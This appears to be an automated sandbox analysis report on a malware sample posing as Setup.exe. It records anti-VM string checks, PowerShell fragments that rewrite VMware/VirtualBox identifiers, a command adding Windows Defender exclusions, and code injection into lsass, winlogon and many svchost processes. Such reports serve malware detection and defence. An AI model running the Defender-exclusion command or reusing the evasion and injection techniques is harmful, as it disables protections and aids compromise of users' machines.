          Source: svchost.exe, 0000000A.00000002.2555931604.0000025C04A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000070.00000000.1631379586.000001778084D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityNECVMWar VMware SATA CD00{4d36e965-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityCD-ROM DriveSCSI\CDROM&VEN_NECVMWAR&PROD_S39LE_9U_SATA_CD00\4&224F42EF&0&000000System.String[](Standard CD-ROM drives)NECVMWar VMware SATA CD00CDROMSCSI\CDROM&VEN_NECVMWAR&PROD_DWR7T7SL_SATA_CD00\4&224F42EF&0&000000cdromOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000068.00000000.1573105114.0000014DE2040000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: svchost.exe, 00000070.00000000.1679265456.00000177FFEB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware(@
          Source: svchost.exe, 00000070.00000002.2809444149.00000177815B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PCI\VEN_15AD&DEV_0740&REV_10PCI\VEN_15AD&DEV_0740PCI\VEN_15AD&CC_088000PCI\VEN_15AD&CC_0880PCI\VEN_15ADPCI\CC_088000PCI\CC_0880VMware, Inc.{4d36e97d-e325-11ce-bfc1-08002be10318}SystemvmciPCI\VEN_15AD&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FWin32_ComputerSystemWin32_PnPEntityuser-PCVMware VMCI Bus DeviceOKVMware VMCI Bus DeviceVMware VMCI Bus Device
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
          Source: OfficeClickToRun.exe, 00000074.00000000.1769933033.000001570EDC5000.00000004.00000001.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000074.00000000.1732873071.000001570D70C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JavaVirtualMachine
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D812000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: svchost.exe, 0000000A.00000002.2555931604.0000025C04A65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
          Source: svchost.exe, 00000070.00000000.1633069505.00000177808D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityVMware Virtual disk SCSI Disk Device{4d36e967-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityDisk driveSCSI\DISK&VEN_U3GCMCE2&PROD_VIRTUAL_DISK\4&1656F219&0&000000System.String[](Standard disk drives)VMware Virtual disk SCSI Disk DeviceDiskDriveSCSI\DISK&VEN_LZ4ZTPLC&PROD_VIRTUAL_DISK\4&1656F219&0&000000diskOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
          Source: lsass.exe, 00000031.00000000.1407209712.000001BA8DA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000038.00000000.1413891488.0000012E36413000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000053.00000000.1477366927.000001B3B942B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000054.00000000.1479752162.0000023368624000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000056.00000000.1485614982.0000029BC7A52000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000058.00000000.1501914715.000002AB7CC43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000005D.00000000.1537778471.000001C25522B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000005E.00000000.1540169933.00000171ACC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000061.00000000.1548378383.000001D50022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000063.00000000.1557193891.000001EAC5C53000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000065.00000000.1565116913.0000015221659000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DiskVMware__Virtual_disk____
          Source: lsass.exe, 00000031.00000000.1407822225.000001BA8DA89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: RVMwareVirtual disk6000c29cbcceb42671d1430c5a2a776c8
          Source: svchost.exe, 00000068.00000000.1573512373.0000014DE206A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: svchost.exe, 00000068.00000002.2538587150.0000014DE2046000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000HD
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DiskVMware__Virtual_disk____2.0_
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value)
          Source: svchost.exe, 00000038.00000003.1564486065.0000012E3646E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000068.00000000.1572890773.0000014DE202B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: svchost.exe, 00000071.00000000.1684040204.000001647AE02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
          Source: lsass.exe, 00000031.00000000.1407822225.000001BA8DA89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
          Source: dialer.exe, 00000051.00000002.2736429489.00000237CEF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=h
          Source: svchost.exe, 00000070.00000000.1665419098.0000017781800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ACPI\VM_Gen_CounterVM_Gen_Counter*PNP0C02Microsoft{4d36e97d-e325-11ce-bfc1-08002be10318}SystemgencounterACPI\VMW0001\7Win32_ComputerSystemWin32_PnPEntityuser-PCMicrosoft Hyper-V Generation CounterOKMicrosoft Hyper-V Generation CounterMicrosoft Hyper-V Generation Counter
          Source: svchost.exe, 0000006D.00000000.1614000316.0000028F03640000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
          Source: svchost.exe, 00000058.00000000.1507761622.000002AB7D720000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c29cbcceb42671d1430c5a2a776cce
          Source: svchost.exe, 00000058.00000000.1509946822.000002AB7D800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: RVMwareVirtual disk6000c29cbcceb42671d1430c5a2a776c0
          Source: svchost.exe, 00000070.00000000.1649347225.0000017781213000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntitySCSI\CDROM&VEN_NECVMWAR&PROD_DWR7T7SL_SATA_CD00\4&224F42EF&0&000000NECVMWar VMware SATA CD00Win32_ComputerSystemuser-PC(Standard CD-ROM drives)SCSI\CDROM&VEN_NECVMWAR&PROD_S39LE_9U_SATA_CD00\4&224F42EF&0&000000NECVMWar VMware SATA CD00System.String[]System.String[]cdrom{4d36e965-e325-11ce-bfc1-08002be10318}CD-ROM DriveWin32_PnPEntityOKCDROMWin32_PnPEntity
          Source: svchost.exe, 00000058.00000000.1524317200.000002AB7F153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000070.00000000.1658423819.00000177814CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityACPI\VMW0001\7Microsoft Hyper-V Generation CounterWin32_ComputerSystemuser-PCMicrosoftACPI\VMW0001\7Microsoft Hyper-V Generation CounterSystem.String[]System.String[]gencounter{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterWin32_PnPEntityOKSystemWin32_PnPEntity
          Source: svchost.exe, 00000070.00000000.1661196455.0000017781590000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\VMware__Virtual_disk____2
          Source: svchost.exe, 00000070.00000000.1679265456.00000177FFEB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NoneVMware(@
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_41-413
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_81-91
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_0000028092387D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,131_2_0000028092387D90
          Source: C:\Windows\System32\dialer.exeCode function: 81_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,81_2_00000001408460F0
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_00000001400017EC GetProcessHeap,RtlAllocateHeap,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,41_2_00000001400017EC
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\dialer.exeCode function: 80_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,80_2_0000000140001160
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_0000028092387D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,131_2_0000028092387D90
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_000002809238D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,131_2_000002809238D2A4

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Allocates memory in foreign processes
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1C8F78F0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1BA8E920000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 12E36FA0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 28F8AE40000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1C8F7960000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1BA8E980000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 12E37000000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 28F8AE70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22C35FA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B3B9390000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23368CB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28B68F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29BC8180000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29D50F40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AB7D2C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E9297D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A183790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D564190000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CF6D790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C2551B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 171ACBC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 283C6530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FF39B80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D500190000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 257B5780000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EAC63D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20428C60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15222280000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16D24BB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 163535B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14DE2730000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B3122B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 7A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184E1BC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 211FEB70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28F03C70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F3D2900000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22EB90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17780D60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1647B460000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 224D0D90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B924FB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1570D1F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1879E9D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 197DB9C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DF6FFB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 229F9BD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1392A290000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 177AD190000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 227FBAE0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20620920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27AAC950000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 167425D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 234F1060000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1A0BCB20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 28092350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1586A4D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2E523130000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 2530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22D497A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22AAA920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FEFBE50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F044E50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 26AF0680000 protect: page execute and read and write
          Contains functionality to inject code into remote processes
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,41_2_0000000140001C88
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: F78F273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: 8E92273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 36FA273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F796273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8E98273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3700273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8AE7273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 35FA273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: B939273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 68CB273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 68F3273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C818273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 50F4273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 7D2C273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 297D273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8379273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6419273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6D79273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 551B273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: ACBC273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C653273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 39B8273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 19273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: B578273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C63D273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 28C6273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2228273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 24BB273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 535B273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E273273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 122B273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 7A273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E1BC273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: FEB7273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 3C7273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D290273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2EB9273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 80D6273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 7B46273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D0D9273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 24FB273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe EIP: D1F273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 9E9D273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: DB9C273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6FFB273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F9BD273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2A29273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\sihost.exe EIP: AD19273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: FBAE273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2092273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: AC95273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 425D273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F106273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\ctfmon.exe EIP: BCB2273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dasHost.exe EIP: 9235273C
